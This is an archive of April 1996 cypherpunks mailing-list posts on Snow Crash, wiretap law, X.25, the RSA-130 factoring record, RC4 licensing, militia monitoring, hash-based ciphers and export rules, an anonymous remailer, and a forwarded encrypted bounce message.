| 
| Lets be concrete. You say that life in the book is nasty, brutish and
| short. The book does not depict people's lives as being short, and it
| especially does not appear that most people living in that world have
| lives that end in violence. Furthermore, it doesn't depict their lives
| as nasty -- it seems like America only more so, with ever escalating
| guarantees that your pizza will be delivered on time and fairly normal
| lives being lead.

	Given that 'nasty, poor, brutish and short' is clearly an
allusion to Hobbes, I'm not sure I should defend it literally.

	However, I'd see life in a converted self store (where Hiro &
Vitaly live), or in a job with a lie detector test every 2 weeks (such
as YT's mom is forced into), or working in a computer industry where
brains get fried (da5vid), as nasty.

	See below for brutish.

| As for illegal immigration, I saw no depiction of it in the book, and
| so far as I can tell the legal structure depicted in the book has no
| such concept as "illegal immigration".

	And how do you think the people panicking over the raft's
arrival see the 'yellow peril?'  I would expect that parts of the
remaining US government are quite distraught over it, and consider it
illegal.

| I can't see that you read the same book.
| 
| As the cypherpunks significance of this is rapidly vanishing, I'd
| suggest that this be taken to private mail.

	The Cypherpunks relevance is that you & I see Snow Crash as a
neat place to live, while Dorothy sees it as a hell.  I'm attempting
to explain that viewpoint.  If you'd like to continue in private mail,
thats fine.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Mon, 15 Apr 1996 15:05:29 +0800
To: jimbell@pacifier.com
Subject: Re: Watch your language, Shabbir.
Message-ID: <960414214548_469881389@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-14 15:10:21 EDT, you write:

>I see no legal reason why wiretaps should have the "features" listed above.
 
>There is a certain practical reason they can:  Due to the nature of 
>wiretapping, it is not physically necessary to show up to do the tap, or 
>tell those targeted, or tell them after the tap has been disconnected.  
>However, it seems very unlikely that the mere fact that an invention allows 
>a kind of search that was possible before, should automatically change the 
>interpretation of the Constitution to allow that search.
>
>If a new invention allowed the cops to walk through walls untraceably, would

>that automatically mean that the normal protections that search warrants are

>supposed to provide are no longer valid?  I don't think so!

Mandating that phone companies allow wiretaps is analogous to mandating that
all houses be constructed of Plexiglas, with the shades on the outside, so
the gov't can look in at their leisure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 15 Apr 1996 15:42:51 +0800
To: Bill Stewart <frissell@panix.com>
Subject: Re: X.25 [NOISE]
Message-ID: <199604150450.VAA12551@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:45 PM 4/14/96 -0700, Bill Stewart wrote:

>And, yes, it's [X.25] a lousy environment to do full-duplex character 
>echo over.

I implemented and have been supporting a system with full-duplex character
echo over X.25.  I can only agree with Bill Stewart's assessment, but you
hold your nose and do it.

I have learned that an X.25 "standard" network is about as standard as a
K&R C compiler.  Sure you can talk to the network, but each network is
different in what you have to do to get it to send you the ASCII characters
so you can echo them.  Many times you have to use non-standard, network
specific extensions.

I am also responsible for getting Zmodem style data transfers to work.  To
make it work means the network must be fully 8-bit transparent, AND send
the last chunk of data eventually (within a few seconds) to complete the
transfer.  Don't even ask about getting Zmodem transfers working thru X.25
to various "Unix" systems.

Now you know why I claimed the title, "Wizard of Trailing Edge Technology"
in Dogbert's New World Order.

Regards - Bill

[To be complete, I also do work in electronic commerce, Java and other
things you see on this list.]


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Apr 1996 20:07:36 +0800
To: cypherpunks@toad.com
Subject: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
Message-ID: <199604150519.WAA09619@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: alenstra@fwi.uva.nl (A. Lenstra)
Newsgroups: sci.crypt.research
Subject: new factorization record
Date: 14 Apr 1996 10:35:20 GMT
Organization: FWI, University of Amsterdam, Bellcore
Lines: 189
Message-ID: <4kqkd8$g37@net.auckland.ac.nz>
Summary: factorization of RSA-130 using the Number Field Sieve
Keywords: factoring, Number Field Sieve, RSA


On April 10, 1996, we found that
 
RSA-130 = 18070820886874048059516561644059055662781025167694013491701270214\
          50056662540244048387341127590812303371781887966563182013214880557
 
has the following factorization
 
RSA-130 = 39685999459597454290161126162883786067576449112810064832555157243
        * 45534498646735972188403686897274408864356301263205069600999044599
 
This factorization was found using the Number Field Sieve (NFS) factoring
algorithm, and beats the 129-digit record that was set on April 2, 1994,
by the Quadratic Sieve (QS) factoring algorithm (cf. [AGLL]). The amount
of computer time spent on this new 130-digit NFS-record is only a fraction
of what was spent on the old 129-digit QS-record (see below for details).
For information about NFS, see [LL]. For additional information,
implementations and previous large NFS factorizations, see [BLZ, DL, E, GLM].
 
We used the polynomial
 
     5748,30224,87384,05200 X^5 +  9882,26191,74822,86102 X^4
  - 13392,49938,91281,76685 X^3 + 16875,25245,88776,84989 X^2
  +  3759,90017,48552,08738 X   - 46769,93055,39319,05995
 
and its root 125,74411,16841,80059,80468 modulo RSA-130. This polynomial
was selected from a list of 14 candidates provided by Scott Huddleston,
after extensive sieving experiments carried out by Joerg Zayer at the
University of Saarland.
 
Sieving was done on a great variety of workstations at many different
locations:
        28.37% by Bruce Dodson (Lehigh University)
        27.77% by Marije Elkenbracht-Huizing (CWI, Amsterdam)
        19.11% by Arjen K. Lenstra (Bellcore)
        17.17% by contributors to the www-factoring project (organized by
                  Jim Cowie, Wojtek Furmanski, and Arjen Lenstra, among others)
         4.36% by Matt Fante (IDA)
         1.66% by Paul Leyland (Oxford University)
         1.56% by Damian Weber (University of Saarland)
 
Except for a relatively small part of the contribution of the CWI and
the entire contribution by the University of Saarland, all contributors
used the NFS sieving program that was developed at Bellcore. This program
uses `lattice sieving with sieving by vectors' as introduced by Pollard
in [P], and is based on the implementation described in [GLM]. The main
difference is the more liberal use of `special q-primes' that define the
lattices (see also [E]). Unlike [GLM], these special q's do not necessarily
belong to the factor base (as is the case in [P]); this idea can also be
found in [B].  Another difference is the more liberal interpretation of
the factor base sizes, which results in a much more flexible memory usage.
 
These changes allowed us to run the sieving program in parallel on almost
any number of processors, as long as they have at least about 6 megabytes
of memory. This was exploited in the Web-based sieving effort, which used
a collection of CGI scripts ("FAFNER", from Cooperating Systems Corporation)
to automate and coordinate the flow of tasks and relations within the
globally distributed network of anonymous sieving clients. As a consequence
almost any user of the Web can contribute to future, larger factoring efforts,
simply by a few appropriate mouse clicks.
 
The changes also made it hard to estimate how much time was spent on the
sieving stage, because the performance of the siever strongly depends
on the amount of memory it gets. We can say, however, that we would have
spent about 500 mips years (i.e., 10% of the computing time spent on the
129-digit QS-record) if we had done all the sieving on average
workstations with at least 24 megabytes of memory.
 
Sieving started in September 1995, initially on a very limited number of
workstations. The Web-based sieving started relatively late, in December
1995. Relations were collected and merged and duplicates were removed at
Bellcore. On Jan 14, 1996, we had 56,515,672 unique relations. In
uncompressed ASCII format, with only the primes >2000000 listed per
factorization, storage of the relations required more than 3.5 gigabytes.
With a rational factor base of 250,001 elements (the primes <= 3,497,867)
and an algebraic factor base of 750,001 elements (ideals of norm <=
11,380,951), the breakdown of full and partial relations is as follows.
 
\ number of prime ideals of norm > 11,380,951:
 \________        0        1        2        3        4        5        6
number of \
rational   \_____________________________________________________________
primes >   |
3,497,867  |
           |
      0    |  48400   479737  1701253  1995537     6836      403        9
      1    | 272793  2728107  9617073 11313254    39755     2212       44
      2    | 336850  3328437 11520120 13030845    56146     3214       71
      3    |   1056     9022    24455        0        0        0        0
      4    |      3        9       31        0        0        0        0
 
The first successful dependency used 4143834 relations, of which 3506 were
free relations. The breakdown of large prime ideals amongst the other
contributing relations is as follows.
 
 
      0    |  24242   154099   330738   255742     1054       52        1
      1    |  75789   443647   885136   648148     2734      164        2
      2    |  56326   300369   565605   389046     1923      131        4
      3    |    182      776     1105        0        0        0        0
      4    |      2        4        7        0        0        0        0
 
 
Once every week during the collection the cycles were counted at Bellcore.
The final collection of 56,467,272 relations with one or more large primes
generated 2,844,859 cycles. In these cycles 18,830,237 (33.3%) of the
partial relations occurred (i.e., were useful). As in our previous NFS
factorizations, we witnessed an explosion in the number of cycles, with
first a sharp increase in the number of useful relations, followed by a
sudden growth of the number of cycles:
 
        # partials      # usefuls       # cycles
        41,319,347          47,660         16,914
        45,431,262       8,214,349        224,865
        53,282,421      11,960,120        972,121
        56,467,272      18,830,237      2,844,859
 
Using the approach sketched in [DL], these data resulted in a
3,504,823 x 3,516,502 matrix of total weight 138,690,744 (on
average 39.4 entries per column). Using Peter Montgomery's Cray
implementation of his blocked Lanczos algorithm (cf. [M95]), it
took 67.5 CPU-hours and 700 Mbyte central memory on the Cray-C90
at the SARA Computer Center in Amsterdam to do the linear algebra.
This resulted in 18 useful dependencies. These were processed on
1 processor of an SGI Challenge (150 MHz R4400SC processors) using
Peter Montgomery's square root program (cf. [M93]), which took 49.5
hours per dependency (with initial numerator and denominator of
approximately 9.7 million decimal digits). The factorization was
found by the third dependency.
 
It is likely that slightly more sieving (and therefore more partials)
would have led to substantially smaller (and easier) matrix and square
root problems.
 
Arjen K. Lenstra, Bellcore, April 11, 1996
 
with    Jim Cowie
        Marije Elkenbracht-Huizing
        Wojtek Furmanski
        Peter L. Montgomery
        Damian Weber
        Joerg Zayer
 
Acknowledgements are due to the contributors, and to the Dutch
National Computing Facilities Foundation (NCF) for the use of
the Cray-C90 supercomputer.
 
 
[AGLL]  D. Atkins, M. Graff, A.K. Lenstra, P.C. Leyland, THE MAGIC
        WORDS ARE SQUEAMISH OSSIFRAGE, Proceedings Asiacrypt'94,
        Lecture Notes in Comput. Sci. 917, (1995) 263-277.
 
[B]     D.J. Bernstein, The multiple-lattice number field sieve, Chapter 3
        of Ph.D. thesis, ftp://koobera.math.uic.edu/pub/papers/mlnfs.dvi.
 
[BLZ]   J. Buchmann, J. Loho, J. Zayer, An implementation of the general
        number field sieve, Proceedings Crypto'93, Lecture Notes in
        Comput. Sci. 773, (1994) 159-165.
 
[DL]    B. Dodson, A.K. Lenstra, NFS with four large primes: an
        explosive experiment, Proceedings Crypto 95, Lecture Notes
        in Comput. Sci. 963, (1995) 372-385.
 
[E]     R.M. Elkenbracht-Huizing, An implementation of the number
        field sieve, Technical Report NM-R9511, Centrum voor
        Wiskunde en Informatica, Amsterdam, 1995. To appear in
        Experimental Mathematics
 
[GLM]   R. Golliver, A.K. Lenstra, K.S. McCurley, Lattice sieving
        and trial division, Algorithmic number theory symposium,
        proceedings, Lecture Notes in Comput. Sci. 877, (1994) 18-27.
 
[LL]    A.K. Lenstra, H.W. Lenstra, Jr., The development of the
        number field sieve, Lecture Notes in Math. 1554, Springer-
        Verlag, Berlin, 1993
 
[M93]   Peter L. Montgomery, Square roots of products of algebraic
        numbers, in Proceedings of Symposia in Applied Mathematics,
        Mathematics of Computation 1943-1993, Vancouver, 1993,
        Walter Gautschi, ed.
 
[M95]   Peter L. Montgomery, A block Lanczos algorithm for finding
        dependencies over GF(2), Proceedings Eurocrypt 1995,
        Lecture Notes in Comput. Sci. 921, (1995) 106-120.
 
[P]     J.M. Pollard, The lattice sieve, pages 43-49 in [LL].
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 15 Apr 1996 16:31:30 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: RC4 licensening
In-Reply-To: <v02120d51ad975a9b17ff@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.960414222327.29016C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Apr 1996, Lucky Green wrote:

> At 18:08 4/14/96, Jack Mott wrote:
> >Hello Cypherworld,
> >        Anyone know how much it costs to license RC4 or how RSA has been
> >handling the whole situation?
> 
> Who cares how much it costs to license RC4. Just use the fully compatible
> freeware RS4 (I believe?) code.

Well, if you're using RC4, you're probably using some sort of public-key 
based key exchange, which you're probably going to need to licence, and 
BSAFE is the easiest way to do that,  so RC4 is pretty much a freebie

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 15 Apr 1996 17:38:35 +0800
To: cypherpunks@toad.com
Subject: Re: Enemies R Us [Political Rant]
In-Reply-To: <960414163840_271703650@emout08.mail.aol.com>
Message-ID: <Pine.ULT.3.92.960414215916.11233A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I've done my best to make this somewhat relevant, and to ignore most of
the obvious trolls.]

On Sun, 14 Apr 1996 JonWienke@aol.com responded to an anonymous troll:

> >At the same time, however, as Federal agencies proceed with
> >traditional means of intelligence gathering (as in the
> >Unabomber case), and Congress ponders a new anti-terrorism
> >bill (stalled by the gun lobby and civil libertarians),
> >efforts to fight domestic terrorism are being supplemented
> >more than ever by private human rights organizations that
> >track the fringe right with their own networks. They willingly
> >share information with law enforcement agencies, branches of
> >the military and reporters.
>
> If Federal LEO's are getting so much help from volunteer snitches, why
> do we need the anti-terrorism bull? :)

We don't. Not that the "volunteer snitches" are anywhere near as important
ans they think they are. Most LEO types will just blow them off, because
there isn't probable cause. Where the private orgs come into play is
*after* some wacko goes postal, and the government wants expert witnesses.

This raises some interesting questions about the power of private data
collection and data havens, though. There is something to be said for the
rule of law. At least the government is somewhat accountable, and will
always be "infiltrated" by professional bureaucrats who care about human
rights. Private organizations are more ideologically coherent and less
likely to open their affairs to public scrutiny.

> >Most of the human rights organizations were actively
> >campaigning against racism and anti-Semitism long before the
> >Oklahoma City bombing on April 19, 1995 and the arrest of two
> >suspects with links to militia groups. And with many of the
> >right-wing groups now hiding racist views beyond a more
> >acceptable veneer of anti-government oratory, the human rights

The more I get into this, the more backwards this sounds. As a FUCKING
STATIST, I'm a lot more comfortable with certain racists than with
anti-government zealots of any political persuasion. This assumes, of
course, that the racists lack sufficient power to put their genocidal
ideas into practice.

> >At least two of them -- the Southern Poverty Law Center in
> >Montgomery, Ala., and the Simon Wiesenthal Center in Los
> >Angeles -- use undercover operatives. Both organizations had
> >spies attend a convention last weekend in Lake Tahoe that
> >attracted hundreds of Christian Identity followers to hear a
> >speech by Randy Weaver, the white separatist whose wife and
> >son were killed three years ago in a siege by Federal agents
> >in Ruby Ridge.

"Undercover operatives" is much too maudlin. I went under my own name,
said hello to a few folks. Weaver is a fucking lunatic, but the skiing
was good.

> >Since the Oklahoma City tragedy, numerous "Patriot" terrorist
> >plots have been discovered, including plans to poison federal
> >employees in Minnesota and conspiracies to blow up a federal
> >courthouse in Spokane and an IRS building in Reno. An AmTrak
> >train was derailed by a group calling itself "Sons of the
> >Gestapo."
>
> Which turned out to have been done by a disgruntled former railroad employee
> who left the "sons of gestapo" note as a red herring.  Could you at least
> stick to propaganda that has at least some basis in fact?

This is news to me. What's your source for this?

> Explosives thefts are nothing new.  Regulation of explosive materials is.
>  Explosives and poisons can be made out of commonly available materials.  If
> this is such a problem, how come this country wasn't bombed and poisoned into
> oblivion 50 years ago?

50 years ago, American citizens of Japanese descent were just being let
out of "internment camps," and the State of Mississippi was keeping files
on 87,000 "political subversives" -- never mind the FBI. I'm not a big fan
of the bad, old days.

30 and 76 years ago, many parts were bombed. Berkeley. Ronald Reagan.
Sacco & Vanzetti. Eugene Debs. Attorney General A. Mitchell Palmer. Forget
everything you've ever been told about "right" and "left"; it's the same
people, really, fighting for the same things, mostly.

> >+ Learn about the "Patriot" movement and share your knowledge
> >with others
>
> Absolutely, yes, hallelujah, preach it brother!  You might want to chesk out
> other sources than the SPLC, however.  The best way to find out what views an
> organization holds is to directly contact the organization, rather than a
> member of the opposition with an axe to grind.

You're joking, right?

To learn what the Church of Scientology is really about, see
http://www.theta.com/

To learn what Watergate was really about, visit the Nixon Presidential
Library.

To learn what the IRA is really about, talk to Gerry Adams.

To learn what the Cuban Revolution is really about, talk to Castro or your
local "Pastors for Peace" propagandist.

No, the only way to learn about an organization is to JOIN IT. You should
see the mail I'm getting now.

> I find it disgusting that a radical left-wing propaganda outlet like the
> SPLC can legally call itself a "charity."

Don't worry, Newt is working on it.

- -rich
 http://www.c2.org/~rich/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXHqX43DXUbM57SdAQEJ9QP/e1BASvp//RnwJieTnkQYuS+x6SUZ0S7m
Vbny4r0Eu7HYUWIyAsMHrme19P/AUVbbxc0O0Ar+uRILfiFkTjM9xIVe6SOTIelX
y3CX96icMObnj5UP5NGcYXJAg11/bAdDlEHWFezXg/qgGdkpzH2iUOhV33gmVwiJ
vLd7DhHORcg=
=XEvm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 15 Apr 1996 17:46:13 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604150519.WAA09619@toad.com>
Message-ID: <199604150622.XAA07542@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, Mike Duvos wrote:

 > On a more serious note, does anyone know what is happening
 > with Arjen Lenstra and RSA-130?  Last I heard back in late
 > December, FAFNER, the magic WWW sieving dragon, had collected
 > more than enough relations from participants to yield a
 > factorization.  Surely they have not spent an additional four
 > months crunching the big boolean matrix at CWI.

On Sat, 30 Mar 1996, Wei Dai wrote:

 > Apparently the Cray they are using to crunch the matrix is
 > busy with higher priority users and they have not been able
 > to squeeze in enough CPU time.  I was told at the beginning
 > of March that they didn't expect to finish before late
 > April, but now it looks like the job will take another two
 > to three months.  Anyone got a spare supercomputer laying
 > around?

On Sun, 14 Apr 1996, Arjen Lenstra wrote:

 > On April 10, 1996, we found that [RSA-130] has the following
 > factorization

 > RSA-130 = 39685999459597454290161126162883786067576449112810064832555157243
 >         * 45534498646735972188403686897274408864356301263205069600999044599

[deletia]

 > Using Peter Montgomery's Cray implementation of his blocked
 > Lanczos algorithm (cf. [M95]), it took 67.5 CPU-hours and
 > 700 Mbyte central memory on the Cray-C90 at the SARA
 > Computer Center in Amsterdam to do the linear algebra.

It appears that the estimates of "another two to three months"
were overly pessimistic.

Does anyone know how big a check Jim Bidzos has to write for this
one?  Also, a ballpark guess of how this result extrapolates to
the MIPS years required to factor a 512 bit PGP key would
probably be of interest to all.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 15 Apr 1996 10:17:53 +0800
To: jeremey@forequest.com
Subject: Re: Is crypt(1) a prohibited export?
In-Reply-To: <Pine.BSI.3.91.960414014821.7867A-100000@newton.forequest.com>
Message-ID: <199604142234.XAA00563@adam.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeremey Barrett <jeremey@forequest.com> writes on cpunks:
> [...] But since a one-way hash function (implemented as a one way
> function) can't really be used for encrypted communication, 

One way hashes can be used to produce an block encryption system
running in CFB mode, eg: Peter Gutmann's MDC.

(CFB mode is where you encrypt an IV (just a random salt) with the
key, and XOR the result with the data (you chaing the encrypting for
subsequent blocks) -- to decrypt you just repeat the process, use the
same IV and encrypt again.  As you never actually use the block
ciphers decrypt function, you can therefore (and this is what MDC
does) use a one way hash in the place of a block encryption algorithm
in CFB mode.)

> I don't think it is subject to export restriction.

They don't seem to be subject to export restrictions, but then perhaps
that is paradoxical, perhaps they should be.  (Well no crypto should
be export restricted in my view naturally, but for logical consistency
you understand...)  It would in my view be a good thing if one way
hash functions were declared to be non-exportable, as this would
clearly hinder commerce, as they are used in signatures and
authentication.

Also I seem to remember that Dan Berntstien's case was based on the
prior restraint in him not being free to discuss his method for
turning a one way hash into a symmetric key function.

Adam
--
Exported RSA today?  --> http://www.dcs.ex.ac.uk/~aba/rsa/

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 15 Apr 1996 17:55:41 +0800
To: "O.C.Winton WN1Z" <cypherpunks@toad.com
Subject: Re: instructions for anon.penet.fi? please
Message-ID: <v02120d56ad979d984034@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:48 4/14/96, O.C.Winton WN1Z wrote:
>Wonder if someone here could pls tell me how to go about finding
>out how to use the anonymous remail services @ anon.penet.fi.
>On the list please.  Thank you.

Send email, any subject, any message body, to help@anon.penet.fi


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 15 Apr 1996 17:48:20 +0800
To: cypherpunks@toad.com
Subject: Heat death of the universe
Message-ID: <199604150448.XAA18708@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 14 Apr 1996 21:19:27 -0700
> X-Sender: tcmay@mail.got.net
> Subject: Re: key bit lengths
> 
> A late April Fool's joke, methinks? Arguing that in "several billion years"
> the "temperature" of the universe will have anything to do with
> computation....well, your physics is all wrong.
> 
> The approximate figure, kT, for the minimum energy in a conventional bit
> flip, can be reduced by simple cooling. Not a problem. And what the
> so-called "average temperature" of the Universe may be in, say, 10 billion
> years, will not affect computation. Fusion will still occur, stars will
> still burn, sunshine will still produce heat. And so on.
> 

True, but there will be considerably fewer of them doing it.

                                               Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clemens Stiglechner <a9401816@unet.univie.ac.at>
Date: Mon, 15 Apr 1996 09:41:13 +0800
To: cypherpunks@toad.com
Subject: [fwd] Undeliverable Message
Message-ID: <3171755D.5A09@unet.univie.ac.at>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It seems that mailer-daemon@usafa.af.mil is running amok; it has
sent 64 *different* *encrypted* messages to the Hemingway List within
6 hours until now. I just wonder which kind of encryption _they_ might
use. Here is the first one:

- -----Beginn Forwarded Message-----

Sender: owner-heming-l-outgoing@mtu.edu
Received: from opus.mtu.edu (opus.mtu.edu [141.219.70.3]) by arl-img-4.compuserve.com 
(8.6.10/5.950515)
	id KAA06421; Sun, 14 Apr 1996 10:17:40 -0400
Received: from mtu.edu (mtu.edu [141.219.70.1])
	by opus.mtu.edu (8.6.13/8.6.10) with ESMTP id KAA18535;
	Sun, 14 Apr 1996 10:17:37 -0400
Received: (from daemon@localhost)
	by mtu.edu (8.6.13/8.6.10) id KAA06326
	for heming-l-outgoing; Sun, 14 Apr 1996 10:17:15 -0400
Received: from 34trwmail.usafa.af.mil ([128.236.38.1])
	by mtu.edu (8.6.13/8.6.10) with SMTP id KAA06314
	for <heming-l@mtu.edu>; Sun, 14 Apr 1996 10:17:13 -0400
X-Authentication-Warning: mtu.edu: Host [128.236.38.1] claimed to be 
34trwmail.usafa.af.mil
Received: by 34trwmail.usafa.af.mil; Sun, 14 Apr 96 8:17:03 MDT
Date: Sun, 14 Apr 96 8:17:02 MDT
Message-ID: <vines.g1Y7+SXEQlA@34trwmail.usafa.af.mil>
X-Priority: 3 (Normal)
To: <heming-l@mtu.edu>
From: <MAILER-DAEMON@usafa.af.mil>
Subject: Undeliverable Message
X-Incognito-SN: 547
X-Incognito-Format: VERSION=2.01 ENCRYPTED=YES
Precedence: list
Reply-To: heming-l@mtu.edu

begin 600 attach.Z
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
/SO&.>_SC(`^YR$=.\G@#
